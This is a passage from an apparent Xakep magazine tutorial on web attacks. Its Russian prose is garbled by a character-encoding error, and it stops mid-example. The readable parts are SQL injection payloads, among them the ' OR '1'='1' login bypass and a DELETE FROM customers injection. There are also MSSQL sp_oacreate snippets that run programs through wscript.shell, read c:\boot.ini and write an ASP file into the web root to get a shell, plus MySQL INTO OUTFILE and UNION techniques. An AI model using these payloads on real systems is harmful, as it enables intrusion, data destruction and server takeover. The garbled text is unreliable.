этом - Xakep Online

31PHPÑîçäàâ òàêîé ôàéë ó ñåáÿ íà ñåðâåðå, ïðîñòî âêëþ-÷àåì åãî â çàïðîñ âìåñòî about.php — è âèäèì âñþèíôîðìàöèþ íà ýêðàíå. Òàêèì îáðàçîì, ìû âíåäðèëèïðîèçâîëüíûé êîä â ñêðèïò íà ñåðâåðå è ïîëó÷èëèíåîáõîäèìóþ èíôîðìàöèþ. Íî ýòî òîëüêîöâåòî÷êè, âåäü ìîæíî ïðè ïîìîùè PHP ñäåëàòüâñå, ÷òî íàøåé äóøå óãîäíî.Íàïèñàâ âûøåîïèñàííûé ïðèìåð, ÿ çàäóìàëñÿî åãî íàèãðàííîñòè è çàøåë â Ãóãë. Êàêîâî æåáûëî ìîå óäèâëåíèå, ÷òî ïî ñîîòâåòñòâóþùåìó çàïðîñó3 ñàéòà èç ïåðâîé äåñÿòêè áûëè óÿçâèìû.Âîèñòèíó — äåíü îòêðûòèé ;).SQL Injection. Ïðèñòóïèì êî âòîðîìó áëþäó —âìåñòî áîðùà ó íàñ èíúåêöèÿ SQL. Äàâíûì-äàâíî,êîãäà ïî çåìëå åùå õîäèëè äèíîçàâðû, âåá-ïðîãðàììåðûèñïîëüçîâàëè äëÿ õðàíåíèÿ äàííûõ òåêñòîâûåôàéëû. Ïîòîì, êîãäà ÷åëîâåê èçîáðåë êîëåñî,âåá-ðàçðàáîò÷èêè ïðèäóìàëè áàçû äàííûõè ñòàëè õðàíèòü âñå â íèõ. È áûëî âñåì ñ÷àñòüå —SQL-êîäâçëîìùèêàÇàïðîñê áàçå äàííûõÑõåìà SQL-èíúåêöèèÏëîõàÿ ôèëüòðàöèÿââîäà íà SQL-îïåðàòîðûè cïèñîê ïîëüçîâàòåëåé òóäà çàñóíóòü ìîæíî, è âñåäîêóìåíòû íà ñàéòå ïîëîæèòü. Íî îäíàæäû îäèíóìåëåö ñëó÷àéíî ââåë â ôîðìó àïîñòðîô, è âûäàëñêðèïò SQL-îøèáêó. Ïðî÷èòàë óìåëåö ñîîáùåíèå,ïîäóìàë íåìíîãî è ââåë âìåñòî àïîñòðîôà ' OR'1'='1’, åùå íåìíîãî ïîêîëäîâàë è ñòàë ñ òåõ ïîð àäìèíèñòðàòîðîì.Íà òîì è ñàéòó êîíåö, à êòî ïîíÿë— ìîëîäåö. À êòî íå ïîíÿë — äëÿ òåõ ïîÿñíþ ;).Ðàáîòà ñ áàçîé âåäåòñÿ íà ÿçûêå SQL, íàïðèìåð,÷òîáû ïðîâåðèòü, ÷òî ïîëüçîâàòåëü ñóùåñòâóåò,ìîæíî ñäåëàòü òàêîé çàïðîñ ïî ëîãèíó:JavaScriptâçëîìùèêàÏëîõàÿ ôèëüòðàöèÿJavaScriptÑòðàíèöà,êîòîðàÿ áóäåòïîêàçàíà ïîëüçîâàòåëþÑõåìà ìåæñàéòîâîãî ñêðèïòèíãàSQLSELECT * FROM users WHERE username='$username'À òåïåðü ïîäñòàâü â çàïðîñ àïîñòðîô èëè ' OR '1'='1’è ïîñìîòðè, ÷òî ïîëó÷èòñÿ. Ôàêòè÷åñêè, ìû ìîæåìâûïîëíèòü ïðîèçâîëüíûé SQL-çàïðîñ, è ñëó÷èòüñÿ÷òî-íèáóäü íåõîðîøåå:SQL'; DELETE FROM customers WHERE 1or username = 'Ñíèïåòû MSSQL-èíúåêöèé äëÿ ActiveX«Advanced SQL Injection In SQL Server Applications»Çàïóñêàåì áëîêíîòdeclare @o intexec sp_oacreate 'wscript.shell', @o outexec sp_oamethod @o, 'run', NULL, 'notepad.exe'[Ñìîòðèì ôàéë boot.ini]declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1exec @ret = sp_oamethod @f, 'readline', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, 'readline', @line outendÏîëó÷àåì shelldeclare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,''[Ñåðâåð ãîâîðèò, ÷òî îí çàõâà÷åí]declare @o int, @ret intexec sp_oacreate 'speech.voicetext', @o outexec sp_oamethod @o, 'register', NULL, 'foo', 'bar'exec sp_oasetproperty @o, 'speed', 150exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528waitfor delay '00:00:05'(1)Õî÷ó êèíóòü åùå ïàðó õîðîøèõ èäåé, êàê ìîæíî âîñïîëüçîâàòüñÿSQL-èíúåêöèåé. Äëÿ ýòîãî ìû ðàññìîòðèìäåòàëè äèàëåêòîâ ÿçûêà SQL ó ðàçíûõ ïðîèçâîäèòåëåé.Íà÷íåì ñ MySQL, êîòîðûé äåëàåò òî, ÷òî ÿîò íåãî íèêàê íå îæèäàë ;). À ïðîáëåìà ïðîñòà: åñëèSELECT-çàïðîñ ïîäâåðæåí èíúåêöèè, òî íå ôàêò, ÷òîåãî ðåçóëüòàò áóäåò âûâåäåí íà ýêðàí, íî åñëè âíèìàòåëüíîïî÷èòàòü ðóêîâîäñòâî ïî MySQL, òî ìîæíîíàéòè çàìå÷àòåëüíûé ôóíêöèîíàë — ðåçóëüòàò çàïðîñàìîæíî ïåðåíàïðàâèòü â ôàéë!SQLSELECT FROM INTO OUTFILE '';Òåïåðü îñòàëîñü íàéòè êàòàëîã, êîòîðûé íàñ ïðèþòèò. ñëó÷àå ñ CMS âñå ðåøàåòñÿ äîâîëüíî ïðîñòî — ïî÷òèâñåãäà åñòü êàòàëîã äëÿ çàãðóçêè ôàéëîâ upload.Èìåííî â òàêîé êàòàëîã è ñòîèò ïåðåíàïðàâëÿòü âûâîä.Íà÷èíàÿ ñ ÷åòâåðòîé âåðñèè, MySQL ïîääåðæèâàåòîáúåäèíåíèå çàïðîñîâ ïðè ïîìîùè êîìàíäûUNION. Òàêèì îáðàçîì, ìîæíî âûâåñòè äîïîëíèòåëüíóþèíôîðìàöèþ èç ïðîèçâîëüíîé òàáëèöû.Ïîñìîòðèì, êàê ýòî âûãëÿäèò íà ïðèìåðå:SQLSELECT title, description FROM articlesWHERE id=’$id’;Title è description èìåþò òèï varchar, ïîýòîìó ïåðåìåííîé$id íóæíî ïðèñâîèòü òàêîå çíà÷åíèå, ÷òîáûïðè ïîäñòàíîâêå ïîëó÷èëñÿ ñëåäóþùèé çàïðîñ:SQLSELECT title, description FROM articlesWHERE id=’123123’